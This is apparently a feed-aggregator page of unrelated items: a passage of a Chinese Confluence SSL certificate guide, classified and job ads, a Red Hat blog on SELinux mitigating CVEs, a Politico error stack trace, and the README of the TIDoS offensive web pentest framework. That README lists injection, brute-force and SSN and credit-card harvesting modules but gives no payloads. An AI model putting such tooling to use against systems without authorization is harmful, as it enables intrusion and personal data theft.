    • 请记录你创建的密码,在下一步中你需要使用到你创建的密码。
    • 默认的密码是 'changeit'。
  3. 根据提示来确定证书的细节。这些信息被用来构造 X.500 实体中的 Distinguished Name (DN) 。

    • First and last name:这个不是你的名字,这个是 Common Name (CN),例如 'confluence.example.com'。CN 必须与 Confluence 使用的域名完全对应,否则 Tomcat 将不能使用你签名的证书。
    • Organizational unit:这个是证书使用的部门或者小组,例如 'marketing'。
    • Organization:是你公司的名字,例如 'SeeSpaceEZ'。
    • City, State / province, country code:这个是你公司的地理位置,例如 Sydney, NSW, AU。
  4. 输出将会如下所示。输入 'y' 来确定你输入的内容。
    CN=confluence.example.com, OU=Marketing, O=SeeSpaceEZ, L=Sydney, ST=NSW, C=AU
  5. 当被询问为 'tomcat' 准备使用的 密码(password )的时候,输入你第二步中输入的密码(在输入密码后单击回车)。
    • 'tomcat' 是你在 keytool 命令行中输入的别名,在这里用来对你提示。
    • 你 keystore 实例必须和你的私有 key 有相同的密码。这个是 Tomcat 服务器要求的。
  6. 你的证书现在已经可以用了,进入 下面 的第二步。

选项 2: 使用 Certificate Authority  签发的证书(推荐)

在生产环境中,你需要使用从 Certificate Authority (CA) 签发的证书。下面的内容是从 Tomcat documentation 中拷贝出来的。

首先你需要创建本地证书,然后基于你创建的本地证书再创建一个 'certificate signing request' (CSR) 。你需要提交 CSR 到你的选择的 CA 提供商上进行收取。CA 将会通过 CSR 将授权后的证书发给你。

  1. 使用 Java 的 keytool 工具来创建一个本地证书(请按照上面第一步所描述的内容)。
  2. 从命令中,将会返回下面的命令工具来创建所需要前面的证书。
    keytool -certreq -keyalg RSA -alias tomcat -file certreq.csr -keystore <MY_KEYSTORE_FILENAME>

    替换 <MY_KEYSTORE_FILENAME> 为路径和你本地证书创建 .keystore 的文件名。

  3. 提交创建的文件为 certreq.csr 到你希望进行授权的 CA。
    (info) 请参考 CA 的文档来找到如何进行这个操作。
  4. CA 将会发个你已经签名好的证书。
  5. 导入新证书到你的本地的 keystore:
    keytool -importcert -alias tomcat -keystore <MY_KEYSTORE_FILENAME> -file <MY_CERTIFICATE_FILENAME>

    一些 CA 可能要求你在安装你的证书之前先安装一个中间人证书。你应该按照 CA  提供的文档来完成你本地证书的成功安装。

如果你使用的是 Verisign 或 GoDaddy,然后你收到了错误的信息,你可能需要将 PKCS12 和你的私钥(private key)同时导出。

  1. 首先,删除添加到 keystore 中的所有 key:
    keytool -delete -alias tomcat -keystore <MY_KEYSTORE_FILENAME>
  2. 然后导出为 PKCS12 格式:
    openssl pkcs12 -export -in <MY_CERTIFICATE_NAME> -inkey <MY_PRIVATEKEY_NAME> -out <MY_PKC12_KEYSTORE_NAME> -name tomcat -CAfile <MY_ROOTCERTIFICATE_NAME-alsoCalledBundleCertificateInGoDaddy> -caname root
  3. 然后导入 PKCS12 到 jks 中:
    keytool -importkeystore -deststorepass <MY_DESTINATIONSTORE_PASSWORD> -destkeypass <MY_DESTINATIONKEY_PASSWORD> -destkeystore <MY_KEYSTORE_FILENAME> -srckeystore <MY_PKC

 

https://www.cwiki.us/display/CONF6ZH/Running+Confluence+Over+SSL+or+HTTPS



作者: OSSEZTEC 
声明: 本文系ITeye网站发布的原创文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

已有 0 人发表回复,猛击->>这里<<-参与讨论


ITeye推荐




          Pickleball      Cache   Translate Page   Web Page Cache   
(South 8th and Apache streets). Loaner paddles are available if you don’t have one. Follow these topics:
          Redirect URL on Drupal installation      Cache   Translate Page   Web Page Cache   
I have a Drupal installation with multiple subdomains on a Linux Server with Apache. I have a customer who changed their domain name and I need to make the change on our server. (Budget: $10 - $30 USD, Jobs: Apache, Drupal, Linux, PHP, System Admin)
           2011 TVS Apache RTR 12000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 38,000, Model: Apache RTR, Year: 2011 , KM Driven: 12,000 km,
TVS Apache Black RTR 180 cc bike with less kilometres driven in very good running condition. Single First Owner. Clear Documents https://www.olx.in/item/2011-tvs-apache-rtr-12000-kms-ID1mBuGl.html
           TVS Apache RTR 44000 Kms 2010 year       Cache   Translate Page   Web Page Cache   
Price: ₹ 24,000, Model: Apache RTR, Year: 2010 , KM Driven: 44,000 km,
TVS Apache RTR 44000 Kms 2010 year https://www.olx.in/item/tvs-apache-rtr-44000-kms-2010-year-ID1mB6PR.html
          Lead Java Developer - Colchester      Cache   Translate Page   Web Page Cache   
Lead Java Developer - Colchester Salary: £80,000 Depending on Experience Key Skills: Masters or equivalent and Computer Science or maths or e-commerce, Agile, technical, object-oriented programming, software development/solutions, management This is an opportunity to work in Essex for an expanding company who are building onto their success as the leading global provider of outsourced business solutions within their initial industry sector. They have the hands-on experience of best practice and state-of-the-art technology to provide in-depth information to boost their customers` efficiency and profitability. The Lead Developer is responsible for the development of enterprise scale platforms used by the wider organisation and beyond. Working across various global projects simultaneously, you would work closely with the Global Development Director to architect software solutions. To be successful you must be able to think creatively with the ability to confidentially and clearly communicate complex technical information to colleagues. It is important that you have experience in a supervisory capacity and enjoy inspiring others. With 10+ years of experience in software development you would be heading up a team of application developers. Eligible to work in UK (NB Client is unable to provide sponsorship) To be successful you must be able to demonstrate your knowledge, skills and experience with: Maintaining and improving competence in java (JEE and swing), relational databases and web page construction (HTML, Javascript, CSS, AJAX, etc). Working within an Agile (Scrumban) development team at all stages of the development cycle. JEE technologies - EJB / Servlet / Spring MVC / JSP / FreeMarker etc Server technologies - JBoss, Tomcat, Websphere, Glassfish, Geronimo, Apache, Linux RDBMS - Oracle, SQL Server, Postgres, MYSQL Integration technologies - JMS / Web Services (REST / SOAP) Relational Mapping Tools - Hibernate / JPA / Toplink Build Tools (Maven, Ant, Gradle) Big Data technologies - NoSQL Databases (Mongo / CouchDB / Neo4j), Hadoop (HDFS / Spark / PIG / HIVE / Sqoop) Analytics - Mahout, WEKA, Tableau, Clikview, Alteryx Database programming - PLSQL / TSQL, Packages / Functions / Procedures If you would like to be considered for this Lead Java Developer role please send your CV. Key Skills: Masters or equivalent and Computer Science or maths or e-commerce, Agile, technical, object-oriented programming, software development/solutions, management Important Information: We endeavour to process your personal data in a fair and transparent manner. In applying for this role, Additional Resources will be acting in your best interest and may contact you in relation to the role, either by email, phone or text message. For more information see our Privacy Policy on our website. It is important you are aware of your individual rights and the provisions the company has put in place to protect your data. If you would like further information on the policy or GDPR please contact us. Additional Resources are an Employment Business and an Employment Agency as defined within The Conduct of Employment Agencies & Employment Businesses Regulations 2003.
          XAMPP 5.6.37-0      Cache   Translate Page   Web Page Cache   
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          linux system administrator and ffmpeg,ffprobe, and handbrakecli      Cache   Translate Page   Web Page Cache   
l am having a issue with ffproble that say "Unable to load FFProbe" you need to fix the issue and make sure you're familiar with debian and ispconfig (Budget: $10 - $30 USD, Jobs: Apache, Debian, Linux, System Admin, Ubuntu)
          How SELinux helps mitigate risk while facilitating compliance      Cache   Translate Page   Web Page Cache   
English

Many of our customers are required to meet a variety of regulatory requirements. Red Hat Enterprise Linux includes security technologies that help meet these requirements. Improving Linux security also benefits our layered products, such as Red Hat OpenShift Container Platform and Red Hat OpenStackⓇ Platform.

In this blog post, we use PCI-DSS to highlight some of the benefits of SELinux. Though there are many other security standards that affect our customers, we selected PCI-DSS based on a review of customer support cases, feedback, and general inquiries we received. The items we selected from this standard are also accepted industry practices, such as:

  • Limiting user access to data based on job roles.
  • Limiting access to system components.
  • Configuring software behavior, functions, and access.

What is SELinux?

SELinux is an advanced access control mechanism originally created by the United States National Security Agency. It was released under an open source license in 2000, and integrated into the Linux kernel in 2003. As part of the Linux kernel, it is built into the core of Red Hat Enterprise Linux. SELinux works by layering additional access controls on top of the traditional discretionary access controls that have been the basis of UNIX and Linux security for decades. SELinux access controls provide both increased granularity as well as a single security policy that is applied across the entire system and enforced by the RHEL kernel. SELinux enforces the security policy on applications bundled with Red Hat Enterprise Linux as well as any custom, third-party, and independent software vendor (ISV) applications. In addition to applications on the host system, SELinux access controls provide separation and controlled sharing between RHEL-hosted virtual machines and containers.

SELinux’s access controls are driven by a configurable security policy, which is loaded into the kernel at boot. The SELinux security policy functions as a whitelist for user and application behavior. The policy allows administrators and policy developers to isolate applications into specific SELinux domains that are tailored to the application’s permitted behaviors. Access to files, local interprocess communications (IPC) mechanisms, the network, and various other system resources can all be restricted on a per-domain basis. SELinux also allows the administrator to put individual SELinux domains, as well as the entire system, into permissive mode where SELinux-based access denials are logged, but the access is still permitted. This eases policy development and troubleshooting.

While SELinux is an important part of Red Hat Enterprise Linux security capabilities, there are many other security technologies and widely accepted practices that should also be employed. Data encryption, malware scanning, firewalls, and other network security mechanisms remain an important part of an overall security strategy. SELinux is a way to augment existing security solutions, and is not a replacement for current security measures that may be in place.

Mapping to compliance requirements

With the above understanding of how SELinux can help reduce risk and harden a Red Hat Enterprise Linux system, let’s see how it maps to a few PCI-DSS compliance requirements. When reviewing PCI-DSS 3.2 requirements, it is easy to see how RHEL with SELinux can help address requirements that fall under the section Implement Strong Access Control Measures Requirement. Let’s look at some lesser-known requirements in sections two and three instead.

PCI-DSS requirement 2.2:

“[d]evelop configuration standards for all system components. Assure that these standards address all known security vulnerabilities and are consistent with industry-accepted system hardening standards.”

Given that, by default, it denies access to any resource rather than permits access, SELinux immediately meets industry-accepted system hardening standards, and may help mitigate certain classes of security vulnerabilities. It also helps meet the more granular requirements under 2.2 by ensuring a greater level of security restrictions and more fine-grained access control.

PCI-DSS requirement 3.6.7:

“Prevention of unauthorized substitution of cryptographic keys”

At a system-configuration level, SELinux can prevent unauthorized overwriting of files—even when a specific user or role would normally be authorized to write to the directory containing cryptographic keys.

SELinux can also help customers meet other well-known PCI-DSS 3.2 requirements by:
Limiting access to system components and cardholder data to only those individuals whose job requires such access. (meets 7.1.1 - 7.1.3)
Establishing an access control system(s) for systems components that restricts access based on a user’s need to know, and is set to ‘deny all’ unless specifically allowed. (meets 7.2.1 - 7.2.3)

Restricting malicious actor read, write, and pivoting

When SELinux is in enforcing mode, the default policy used in Red Hat Enterprise Linux is the targeted policy. In the default targeted policy, some applications run in a confined SELinux domain where SELinux policy restricts those applications to a particular set of behaviors. All other applications run in special unconfined domains; while they are still SELinux security domains, there is little to no restriction to their permitted behavior.

Almost every service that listens on a network is confined in RHEL, such as httpd and sshd. Also, most processes that run as the root user and perform tasks for users, such as the passwd utility, are confined. When a process is confined, it runs in its own domain. Depending on the SELinux policy configuration for a confined process, an attacker's access to resources, ability to pivot, read, and write, and the possible damage they can do may be limited.

We have listed below a few of the common processes and daemons that run confined by default in their own domain. If you have a question regarding a process that is not listed here, send your inquiry to Red Hat Customer Service.

  • dhcpd is a dynamic host control protocol used in Red Hat Enterprise Linux to dynamically deliver and configure Layer 3 TCP/IP details for clients.
  • smbd is a Samba server that provides file and print services between clients across various operating systems.
  • httpd (Apache HTTP Server) provides a web server.
  • Squid is a high-performance proxy caching server for web clients supporting FTP, Gopher, and HTTP data objects. It reduces bandwidth and improves response times by caching and reusing frequently requested web pages.
  • mysqld is a multi-user, multi-threaded SQL database server that consists of the MariaDB server daemon (mysqld) and many client programs and libraries.
  • PostgreSQL is an Object-Relational database management system (DBMS).
  • Postfix is an open-source Mail Transport Agent (MTA), which supports protocols like LDAP, SMTP AUTH (SASL), and TLS.

For more information on how the Red Hat portfolio can help customers with PCI-DSS compliance, review Red Hat’s 2015 paper on PCI and DSS compliance and our 2016-2017 blog series.

Vulnerabilities

SELinux can also help mitigate many risks posed from privilege escalation attacks. SELinux policy rules define how processes access files and other processes. If a process is compromised, the attacker can only access resources granted to it through the associated SELinux domain. Exploiting an application does not change what SELinux allows the process to access. For example, if the Apache HTTP Server is compromised, an attacker cannot use that process to read files in user home directories by default, unless a specific SELinux policy rule was added or configured to allow such access.

Based on our review of data from the 2017 calendar year, we selected three vulnerabilities publicly released during that time which were mitigated by default Red Hat Enterprise Linux SELinux policies.

CVE-2016-9962 targeted containers, and it became public just 11 days into the new year. On Red Hat systems with SELinux enabled, the dangers of even privileged containers are mitigated. SELinux prevents container processes from accessing host content even if those container processes manage to gain access to the actual file descriptors. With SELinux in enforcing mode, and enabling the default SELinux policy (deny_ptrace) which only affects the policy shipped by Fedora or Red Hat, customers can:
- remove all ptrace,
- confine an unconfined domain, and
- retain the flexibility to disable it permanently or temporarily for troubleshooting.

CVE-2017-6074 addressed a flaw in the Datagram Congestion Control Protocol (DCCP). If exploited by a local, unprivileged user, the user could alter the kernel memory and escalate their privileges on the system. With SELinux enabled and using the default policies alone, this flaw is mitigated.

CVE-2017-7494 addressed a vulnerable Samba client. A malicious authenticated Samba client, having write access to the Samba share, could use this flaw to execute arbitrary code as root. When SELinux is enabled by default, our default policy prevents loading of modules from outside of Samba's module directories and therefore mitigates the flaw.

Red Hat and security

At Red Hat we believe that security is a mindset, not a feature. That’s why we work closely with upstream developers and communities to encourage secure coding practices, information sharing, and collaboration. We firmly believe the principles of open source software contribute to transparency and more secure products, benefiting customers and communities alike.

SELinux is shipped enabled by default in Red Hat Enterprise Linux. In addition to providing added security and mitigating a threat actor’s ability to pivot, SELinux also helps customers meet a variety of compliance standards requirements. And although the terms compliant and secure are not directly interchangeable, we understand that both are very important to our customers. We work continuously to support our products and help our customers achieve both business objectives.

For more information on Red Hat Product Security, visit the Product Security Center on the Red Hat Customer Portal. If you have vulnerability information you would like to share with us, please send an email to secalert@redhat.com.

Product

Red Hat Enterprise Linux

Category

Secure

Tags

selinux

Component

dhcp httpd mysql postfix postgresql samba squid

          Trump allies luring Hope Hicks into 2020 campaign      Cache   Translate Page   Web Page Cache   
Can't render /story/2018/08/09/hope-hicks-trump-white-house-768763! No default database! (check [dari/defaultDatabase] setting) (com.psddev.dari.util.SettingsException)com.psddev.dari.util.Settings.checkValue(Settings.java:312)com.psddev.dari.util.Settings.getOrError(Settings.java:360)com.psddev.dari.db.Database$ Static.getDefaultOriginal(Database.java:284)com.psddev.dari.db.Database$ Static.getDefault(Database.java:273)com.psddev.cms.db.PageFilter$ Static.getMainObject(PageFilter.java:1802)com.politico.filters.MergedTagPageRedirectFilter.doRequest(MergedTagPageRedirectFilter.java:19)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:424)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.ResourceFilter.doRequest(ResourceFilter.java:64)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.PingFilter.doRequest(PingFilter.java:38)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.HtmlApiFilter.doRequest(HtmlApiFilter.java:44)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:424)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.NoSessionFilter.doRequest(NoSessionFilter.java:55)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.PageContextFilter.doRequest(PageContextFilter.java:60)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.MultipartRequestFilter.doRequest(MultipartRequestFilter.java:35)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.StatsFilter.doRequest(StatsFilter.java:46)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.ProfilerFilter.doDispatch(ProfilerFilter.java:36)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.DebugFilter.doRequest(DebugFilter.java:250)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.DebugFilter.doDispatch(DebugFilter.java:171)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.ResourceFilter.doRequest(ResourceFilter.java:64)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:205)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.DebugFilter$ SettingsOverrideFilter.doRequest(DebugFilter.java:752)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.LogCaptureFilter.doRequest(LogCaptureFilter.java:43)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.HeaderResponseFilter.doRequest(HeaderResponseFilter.java:34)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:205)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.Utf8Filter.doRequest(Utf8Filter.java:91)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.cms.rtc.RtcFilter.doRequest(RtcFilter.java:106)com.psddev.dari.util.AbstractFilter.doDispatch(AbstractFilter.java:420)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:582)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)com.psddev.dari.util.AbstractFilter$ DependencyFilterChain.doFilter(AbstractFilter.java:575)com.psddev.dari.util.AbstractFilter.doFilter(AbstractFilter.java:292)org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:203)org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:106)org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:503)org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:136)org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:79)org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:88)org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:676)org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:526)org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)org.apache.coyote.AbstractProtocol$ AbstractConnectionHandler.process(AbstractProtocol.java:655)org.apache.coyote.http11.Http11NioProtocol$ Http11ConnectionHandler.process(Http11NioProtocol.java:222)org.apache.tomcat.util.net.NioEndpoint$ […]
          TIDoS Framework - The Offensive Web Application Penetration Testing Framework      Cache   Translate Page   Web Page Cache   

TIDoS Framework is a comprehensive web-app audit framework. let's keep this simple

Highlights :-
The main highlights of this framework is:
  • TIDoS Framework now boasts of a century+ of modules.
  • A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.
  • Has 5 main phases, subdivided into 14 sub-phases consisting a total of 104 modules.
  • Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).
  • Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc)
  • Vulnerability Analysis Phase has 36 modules (including most common vulnerabilites in action).
  • Exploits Castle has only 1 exploit. (purely developmental)
  • And finally, Auxillaries have got 4 modules. under dev.
  • All four phases each have a Auto-Awesome module which automates every module for you.
  • You just need the domain, and leave everything is to this tool.
  • TIDoS has full verbose out support, so you'll know whats going on.
  • Fully user friendly interaction environment. (no shits)


Installation :
  • Clone the repository locally and navigate there:
git clone https://github.com/theinfecteddrake/tidos-framework.git
cd tidos-framework
  • Install the dependencies:
chmod +x install
./install


Thats it! Now you are good to go! Now lets run the tool:
tidos

Getting Started :-
TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.
But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!
Finally, as the framework opens up, enter the website name eg. http://www.example.com and let TIDoS lead you. Thats it! Its as easy as that.
Recommended:
  • Follow the order of the tool (Run in a schematic way).
    Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis
To update this tool, use tidos_updater.py module under tools/ folder.

Flawless Features :-
TIDoS Framework presently supports the following: and is under active development
  • Reconnaissance + OSINT
    • Passive Reconnaissance:
      • Nping Enumeration Via external APi
      • WhoIS Lookup Domain info gathering
      • GeoIP Lookup Pinpoint physical location
      • DNS Configuration Lookup DNSDump
      • Subdomains Lookup Indexed ones
      • Reverse DNS Lookup Host Instances
      • Reverse IP Lookup Hosts on same server
      • Subnets Enumeration Class Based
      • Domain IP History IP Instances
      • Web Links Gatherer Indexed ones
      • Google Search Manual search
      • Google Dorking (multiple modules) Automated
      • Email to Domain Resolver Email WhoIs
      • Wayback Machine Lookups Find Backups
      • Breached Email Check Pwned Email Accounts
      • Enumeration via Google Groups Emails Only
      • Check Alias Availability Social Networks
      • Find PasteBin Posts Domain Based
      • LinkedIn Gathering Employees & Company
      • Google Plus Gathering Domain Profiles
      • Public Contact Info Scraping FULL CONTACT
      • Censys Intel Gathering Domain Based
      • Threat Intelligence Gathering Bad IPs
    • Active Reconnaissance
      • Ping Enumeration Advanced
      • CMS Detection (185+ CMSs supported) IMPROVED
      • Advanced Traceroute IMPROVED
      • robots.txt and sitemap.xml Checker
      • Grab HTTP Headers Live Capture
      • Find HTTP Methods Allowed via OPTIONS
      • Detect Server Type IMPROVED
      • Examine SSL Certificate Absolute
      • Apache Status Disclosure Checks File Based
      • WebDAV HTTP Enumeration PROFIND & SEARCH
      • PHPInfo File Enumeration via Bruteforce
      • Comments Scraper Regex Based
      • Find Shared DNS Hosts Name Server Based
      • Alternate Sites Discovery User-Agent Based
      • Discover Interesting Files via Bruteforce
        • Common Backdoor Locations shells, etc.
        • Common Backup Locations .bak, .db, etc.
        • Common Password Locations .pgp, .skr, etc.
        • Common Proxy Path Configs. .pac, etc.
        • Common Dot Files .htaccess, .apache, etc
    • Information Disclosure
      • Credit Cards Disclosure If Plaintext
      • Email Harvester IMPROVED
      • Fatal Errors Enumeration Includes Full Path Disclosure
      • Internal IP Disclosure Signature Based
      • Phone Number Havester Signature Based
      • Social Security Number Harvester US Ones
  • Scanning & Enumeration
    • Remote Server WAF Enumeration Generic 54 WAFs
    • Port Scanning Ingenious Modules
      • Simple Port Scanner via Socket Connections
      • TCP SYN Scan Highly reliable
      • TCP Connect Scan Highly Reliable
      • XMAS Flag Scan Reliable Only in LANs
      • Fin Flag Scan Reliable Only in LANs
      • Port Service Detector
    • Web Technology Enumeration Absolute
    • Operating System Fingerprinting IMPROVED
    • Banner Grabbing of Services via Open Ports
    • Interactive Scanning with NMap 16 preloaded modules
    • Enumeration Domain-Linked IPs Using CENSYS Database
    • Web and Links Crawlers
      • Depth 1 Indexed Uri Crawler
      • Depth 2 Single Page Crawler
      • Depth 3 Web Link Crawler
  • Vulnerability Analysis
    Web-Bugs & Server Misconfigurations
    • Insecure CORS Absolute
    • Same-Site Scripting Sub-domain based
    • Zone Transfer DNS Server based
    • Clickjacking
      • Frame-Busting Checks
      • X-FRAME-OPTIONS Header Checks
    • Security on Cookies
      • HTTPOnly Flag
      • Secure Flag
    • Cloudflare Misconfiguration Check
      • DNS Misconfiguration Checks
      • Online Database Lookup For Breaches
    • HTTP Strict Transport Security Usage
      • HTTPS Enabled but no HSTS
    • Domain Based Email Spoofing
      • Missing SPF Records
      • Missing DMARC Records
    • Host Header Injection
      • Port Based Over HTTP 80
      • X-Forwarded-For Header Injection
    • Security Headers Analysis Live Capture
    • Cross-Site Tracing HTTP TRACE Method
    • Session Fixation via Cookie Injection
    • Network Security Misconfig.
      • Checks for TELNET Enabled via Port 23
    Serious Web Vulnerabilities
    • File Inclusions
      • Local File Inclusion (LFI) Param based
      • Remote File Inclusion (RFI) IMPROVED
        • Parameter Based
        • Pre-loaded Path Based
    • OS Command Injection Linux & Windows (RCE)
    • Path Traversal (Sensitive Paths)
    • Cross-Site Request Forgery Absolute
    • SQL Injection
      • Error Based Injection
        • Cookie Value Based
        • Referer Value Based
        • User-Agent Value Based
        • Auto-gathering IMPROVED
      • Blind Based Injection Crafted Payloads
        • Cookie Value Based
        • Referer Value Based
        • User-Agent Value Based
        • Auto-gathering IMPROVED
    • LDAP Injection Parameter Based
    • HTML Injection Parameter Based
    • Bash Command Injection ShellShock
    • XPATH Injection Parameter Based
    • Cross-Site Scripting IMPROVED
      • Cookie Value Based
      • Referer Value Based
      • User-Agent Value Based
      • Parameter Value Based Manual
    • Unvalidated URL Forwards Open Redirect
    • PHP Code Injection Windows + Linux
    • HTTP Response Splitting CRLF Injection
      • User-Agent Value Based
      • Parameter value Based Manual
    • Sub-domain Takeover 50+ Services
      • Single Sub-domain Manual
      • All Subdomains Automated
    Other
    • PlainText Protocol Default Credential Bruteforce
      • FTP Protocol Bruteforce
      • SSH Protocol Bruteforce
      • POP 2/3 Protocol Bruteforce
      • SQL Protocol Bruteforce
      • XMPP Protocol Bruteforce
      • SMTP Protocol Bruteforce
      • TELNET Protocol Bruteforce
  • Auxillary Modules
    • Hash Generator MD5, SHA1, SHA256, SHA512
    • String & Payload Encoder 7 Categories
    • Forensic Image Analysis Metadata Extraction
